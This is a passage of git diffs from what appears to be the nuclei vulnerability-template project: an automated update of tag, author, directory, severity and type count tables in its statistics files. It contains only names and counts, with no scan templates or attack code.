dotnetnuke | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| bingmaps | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| okta | 1 | | | | | | | | | +| smartblog | 1 | | | | | | | | | +| natemail | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| visualstudio | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| meraki | 1 | | | | | | | | | +| python | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| matrix | 1 | | | | | | | | | +| sterling | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| key | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| speed | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| whm | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| buttercms | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| adiscon | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| oneblog | 1 | | | | | | | | | +| mkdocs | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| acontent | 1 | | | | | | | | | +| default | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| dropbox | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| nifi | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| elfinder | 1 | | | | | | | | | +| tinypng | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| cvnd | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| wix | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| eyelock | 1 | | | | | | | | | +| hubspot | 1 | | | | | | | | | +| nerdgraph | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| tieline | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| ipstack | 1 | | | | | | | | | +| bigbluebutton | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| adafruit | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| limit | 1 | | | | | | | | | +| iterable | 1 | | | | | | | | | +| photo | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| cve2006 | 1 | | | | | | | | | +| elasticsearch | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| manager | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| circle | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| streetview | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| imap | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| leanix | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| csrfguard | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| luftguitar | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| ognl | 1 | | | | | | | | | +| couchbase | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| shoppable | 1 | | | | | | | | | +| kindeditor | 1 | | | | | | | | | +| okiko | 1 | | | | | | | | | +| influxdb | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| intercom | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| werkzeug | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| cockpit | 1 | | | | | | | | | +| appveyor | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | | monitorix | 1 | | | | | | | | | | panabit | 1 | | | | | | | | | -| gilacms | 1 | | | | | | | | | -| autocomplete | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| spotify | 1 | | | | | | | | | -| mediumish | 1 | | | | | | | | | -| owasp | 1 | | | | | | | | | -| wing-ftp | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| linkedin | 1 | | | | | | | | | -| zm | 1 | | | | | | | | | -| resourcespace | 1 | | | | | | | | | -| circleci | 1 | | | | | | | | | -| clave | 1 | | | | | | | | | -| monitorr | 1 | | | | | | | | | -| key | 1 | | | | | | | | | -| tcexam | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| imap | 1 | | | | | | | | | -| flexbe | 1 | | | | | | | | | -| etouch | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| smartsense | 1 | | | | | | | | | -| openweather | 1 | | | | | | | | | -| szhe | 1 | | | | | | | | | -| testrail | 1 | | | | | | | | | -| jfrog | 1 | | | | | | | | | -| glowroot | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| linksys | 1 | | | | | | | | | -| vsftpd | 1 | | | | | | | | | -| sql | 1 | | | | | | | | | -| ems | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| wondercms | 1 | | | | | | | | | -| miscrsoft | 1 | | | | | | | | | -| concrete | 1 | | | | | | | | | -| influxdb | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| 74cms | 1 | | | | | | | | | -| office365 | 1 | | | | | | | | | -| scs | 1 | | | | | | | | | -| pagespeed | 1 | | | | | | | | | -| alerta | 1 | | | | | | | | | -| centos | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | -| ognl | 1 | | | | | | | | | -| fortigate | 1 | | | | | | | | | -| rsyncd | 1 | | | | | | | | | -| ruby | 1 | | | | | | | | | -| opentsdb | 1 | | | | | | | | | -| processmaker | 1 | | | | | | | | | -| tongda | 1 | | | | | | | | | -| adiscon | 1 | | | | | | | | | -| phpfastcache | 1 | | | | | | | | | -| swagger | 1 | | | | | | | | | -| sureline | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| interlib | 1 | | | | | | | | | -| terraform | 1 | | | | | | | | | -| asana | 1 | | | | | | | | | -| phpunit | 1 | | | | | | | | | -| clickhouse | 1 | | | | | | | | | -| dahua | 1 | | | | | | | | | -| sco | 1 | | | | | | | | | -| keenetic | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | -| webui | 1 | | | | | | | | | -| huijietong | 1 | | | | | | | | | -| auth | 1 | | | | | | | | | -| circontrol | 1 | | | | | | | | | -| digitalocean | 1 | | | | | | | | | -| bigbluebutton | 1 | | | | | | | | | -| scimono | 1 | | | | | | | | | -| fortilogger | 1 | | | | | | | | | -| viewlinc | 1 | | | | | | | | | -| fiori | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| zte | 1 | | | | | | | | | -| pendo | 1 | | | | | | | | | -| openrestry | 1 | | | | | | | | | -| javafaces | 1 | | | | | | | | | -| skycaiji | 1 | | | | | | | | | -| novnc | 1 | | | | | | | | | -| rhymix | 1 | | | | | | | | | -| gsoap | 1 | | | | | | | | | -| jitsi | 1 | | | | | | | | | -| couchbase | 1 | | | | | | | | | -| jumpcloud | 1 | | | | | | | | | -| blue-ocean | 1 | | | | | | | | | -| geocode | 1 | | | | | | | | | -| werkzeug | 1 | | | | | | | | | -| jabber | 1 | | | | | | | | | -| spf | 1 | | | | | | | | | -| jenkin | 1 | | | | | | | | | -| beanstalk | 1 | | | | | | | | | -| mantisbt | 1 | | | | | | | | | -| sprintful | 1 | | | | | | | | | -| achecker | 1 | | | | | | | | | -| shoppable | 1 | | | | | | | | | -| xml | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| cyberoam | 1 | | | | | | | | | -| ueditor | 1 | | | | | | | | | -| livezilla | 1 | | | | | | | | | -| meraki | 1 | | | | | | | | | -| tinypng | 1 | | | | | | | | | -| dropbox | 1 | | | | | | | | | -| mpsec | 1 | | | | | | | | | -| zcms | 1 | | | | | | | | | -| phpshowtime | 1 | | | | | | | | | -| jsp | 1 | | | | | | | | | -| rmc | 1 | | | | | | | | | -| wakatime | 1 | | | | | | | | | -| sidekiq | 1 | | | | | | | | | -| myvuehelp | 1 | | | | | | | | | -| alertmanager | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| xampp | 1 | | | | | | | | | -| oidc | 1 | | | | | | | | | -| mkdocs | 1 | | | | | | | | | -| node-red-dashboard | 1 | | | | | | | | | -| svnserve | 1 | | | | | | | | | -| playable | 1 | | | | | | | | | -| seacms | 1 | | | | | | | | | -| mariadb | 1 | | | | | | | | | -| gateone | 1 | | | | | | | | | -| opensns | 1 | | | | | | | | | -| announcekit | 1 | | | | | | | | | -| ioncube | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | -| qsan | 1 | | | | | | | | | -| weather | 1 | | | | | | | | | -| ewebs | 1 | | | | | | | | | -| zyxel | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| shoretel | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| htmli | 1 | | | | | | | | | -| k8 | 1 | | | | | | | | | -| nimble | 1 | | | | | | | | | -| bing | 1 | | | | | | | | | -| redhat | 1 | | | | | | | | | -| phalcon | 1 | | | | | | | | | -| zzzcms | 1 | | | | | | | | | -| burp | 1 | | | | | | | | | -| tenda | 1 | | | | | | | | | -| emby | 1 | | | | | | | | | -| remkon | 1 | | | | | | | | | -| bazarr | 1 | | | | | | | | | -| exponentcms | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | | exacqvision | 1 | | | | | | | | | -| graphite | 1 | | | | | | | | | -| pcoip | 1 | | | | | | | | | -| acexy | 1 | | | | | | | | | -| clockwatch | 1 | | | | | | | | | -| tracer | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| newrelic | 1 | | | | | | | | | -| twitter-server | 1 | | | | | | | | | -| bolt | 1 | | | | | | | | | -| rmi | 1 | | | | | | | | | -| drone | 1 | | | | | | | | | -| sgp | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| ewebs | 1 | | | | | | | | | +| wakatime | 1 | | | | | | | | | +| travis | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| cscart | 1 | | | | | | | | | +| particle | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| contentkeeper | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| shoretel | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| cloudron | 1 | | | | | | | | | +| xmpp | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| nearby | 1 | | | | | | | | | +| tcexam | 1 | | | | | | | | | +| metabase | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| buildkite | 1 | | | | | | | | | +| instagram | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| adb | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| nimble | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | | actuator | 1 | | | | | | | | | -| mautic | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| dnssec | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| olivetti | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| vercel | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| skycaiji | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| glowroot | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| twitter | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| messaging | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| placeos | 1 | | | | | | | | | +| pmb | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| catfishcms | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| webex | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| phpfastcache | 1 | | | | | | | | | +| deviantart | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| onelogin | 1 | | | | | | | | | +| flexbe | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| place | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| geocode | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| newrelic | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| postmark | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| distance | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| logontracer | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| graphql | 1 | | | | | | | | | +| route | 1 | | | | | | | | | +| basic-auth | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| processmaker | 1 | | | | | | | | | +| artica | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| timezone | 1 | | | | | | | | | +| exponentcms | 1 | | | | | | | | | +| miscrsoft | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| spotify | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| gitea | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| karel | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| xampp | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| novnc | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| clockwork | 1 | | | | | | | | | +| burp | 1 | | | | | | | | | +| tracer | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| netgenie | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| cves2001 | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| nc2 | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| sophos | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| asana | 1 | | | | | | | | | +| zms | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| testrail | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | +| turbocrm | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| eg | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| database | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| directions | 1 | | | | | | | | | +| mapbox | 1 | | | | | | | | | +| pivotaltracker | 1 | | | | | | | | | +| apigee | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| optimizely | 1 | | | | | | | | | +| elascticsearch | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| axiom | 1 | | | | | | | | | +| playable | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| stripe | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| tinymce | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| frontpage | 1 | | | | | | | | | +| jabber | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| zyxel | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| beanstalk | 1 | | | | | | | | | +| package | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| calendly | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| gilacms | 1 | | | | | | | | | +| shopizer | 1 | | | | | | | | | +| vidyo | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| remkon | 1 | | | | | | | | | +| daybyday | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| syslog | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| mrtg | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| clickhouse | 1 | | | | | | | | | +| tugboat | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| secmail | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| weather | 1 | | | | | | | | | +| geolocation | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| elevation | 1 | | | | | | | | | +| strava | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| clink-office | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| roads | 1 | | | | | | | | | +| trane | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| cve202 | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| gloo | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| pagerduty | 1 | | | | | | | | | +| fontawesome | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| auth | 1 | | | | | | | | | +| pendo | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| gunicorn | 1 | | | | | | | | | +| gurock | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| loganalyzer | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| netlify | 1 | | | | | | | | | +| yzmcms | 1 | | | | | | | | | +| raspap | 1 | | | | | | | | | +| azkaban | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| sugarcrm | 1 | | | | | | | | | +| gotmls | 1 | | | | | | | | | +| dbt | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| sureline | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| tink | 1 | | | | | | | | | +| myvuehelp | 1 | | | | | | | | | +| graphite | 1 | | | | | | | | | +| motorola | 1 | | | | | | | | | +| forcepoint | 1 | | | | | | | | | +| paypal | 1 | | | | | | | | | +| graylog | 1 | | | | | | | | | +| sql | 1 | | | | | | | | | +| digitalocean | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| kyan | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| craftcms | 1 | | | | | | | | | +| maxsite | 1 | | | | | | | | | +| resourcespace | 1 | | | | | | | | | +| panasonic | 1 | | | | | | | | | +| graph | 1 | | | | | | | | | +| pcoip | 1 | | | | | | | | | +| minimouse | 1 | | | | | | | | | +| api-manager | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| cyberoam | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| dreamweaver | 1 | | | | | | | | | +| securityspy | 1 | | | | | | | | | +| owa | 1 | | | | | | | | | +| mod-proxy | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| autocomplete | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| gsoap | 1 | | | | | | | | | +| gstorage | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| sonarcloud | 1 | | | | | | | | | +| ghost | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| pihole | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| circleci | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| solarlog | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| woocommerce | 1 | | | | | | | | | +| billquick | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| wp | 1 | | | | | | | | | +| openweather | 1 | | | | | | | | | +| terraform | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| lokalise | 1 | | | | | | | | | +| youtube | 1 | | | | | | | | | +| mailgun | 1 | | | | | | | | | +| loqate | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | +| details | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| square | 1 | | | | | | | | | +| taiga | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| shiro | 1 | | | | | | | | | +| omi | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| fcm | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 35c081239b..1569a3d987 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 838 | dhiyaneshdk | 296 | cves | 842 | info | 775 | http | 2244 | -| lfi | 344 | daffainfo | 289 | vulnerabilities | 329 | high | 651 | file | 50 | -| panel | 284 | pikpikcu | 281 | exposed-panels | 278 | medium | 478 | network | 46 | -| xss | 259 | pdteam | 201 | technologies | 202 | critical | 297 | dns | 12 | -| wordpress | 255 | geeknik | 166 | exposures | 196 | low | 156 | | | -| exposure | 245 | dwisiswant0 | 131 | misconfiguration | 143 | | | | | -| rce | 215 | gy741 | 83 | takeovers | 65 | | | | | -| tech | 196 | pussycat0x | 74 | token-spray | 63 | | | | | -| wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | | -| cve2020 | 166 | madrobot | 63 | file | 50 | | | | | +| cve | 843 | dhiyaneshdk | 300 | cves | 847 | info | 806 | http | 2286 | +| lfi | 348 | daffainfo | 290 | vulnerabilities | 332 | high | 655 | file | 51 | +| panel | 292 | pikpikcu | 281 | exposed-panels | 286 | medium | 483 | network | 46 | +| xss | 260 | pdteam | 202 | technologies | 203 | critical | 299 | dns | 12 | +| wordpress | 260 | geeknik | 166 | exposures | 199 | low | 157 | | | +| exposure | 248 | dwisiswant0 | 152 | misconfiguration | 143 | | | | | +| rce | 218 | gy741 | 83 | token-spray | 83 | | | | | +| tech | 197 | pussycat0x | 76 | takeovers | 66 | | | | | +| wp-plugin | 180 | princechaddha | 67 | default-logins | 60 | | | | | +| cve2020 | 166 | madrobot | 63 | file | 51 | | | | | From bbbd7909ee46a6643cdee29cf99c651e586e1f12 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 27 Oct 2021 13:25:28 +0000 Subject: [PATCH 3253/4083] Auto README Update [Wed Oct 27 13:25:28 UTC 2021] :robot: --- README.md | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/README.md b/README.md index c5a55a6c3c..6885808669 100644 --- a/README.md +++ b/README.md @@ -42,16 +42,16 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 838 | dhiyaneshdk | 296 | cves | 842 | info | 775 | http | 2244 | -| lfi | 344 | daffainfo | 289 | vulnerabilities | 329 | high | 651 | file | 50 | -| panel | 284 | pikpikcu | 281 | exposed-panels | 278 | medium | 478 | network | 46 | -| xss | 259 | pdteam | 201 | technologies | 202 | critical | 297 | dns | 12 | -| wordpress | 255 | geeknik | 166 | exposures | 196 | low | 156 | | | -| exposure | 245 | dwisiswant0 | 131 | misconfiguration | 143 | | | | | -| rce | 215 | gy741 | 83 | takeovers | 65 | | | | | -| tech | 196 | pussycat0x | 74 | token-spray | 63 | | | | | -| wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | | -| cve2020 | 166 | madrobot | 63 | file | 50 | | | | | +| cve | 843 | dhiyaneshdk | 300 | cves | 847 | info | 806 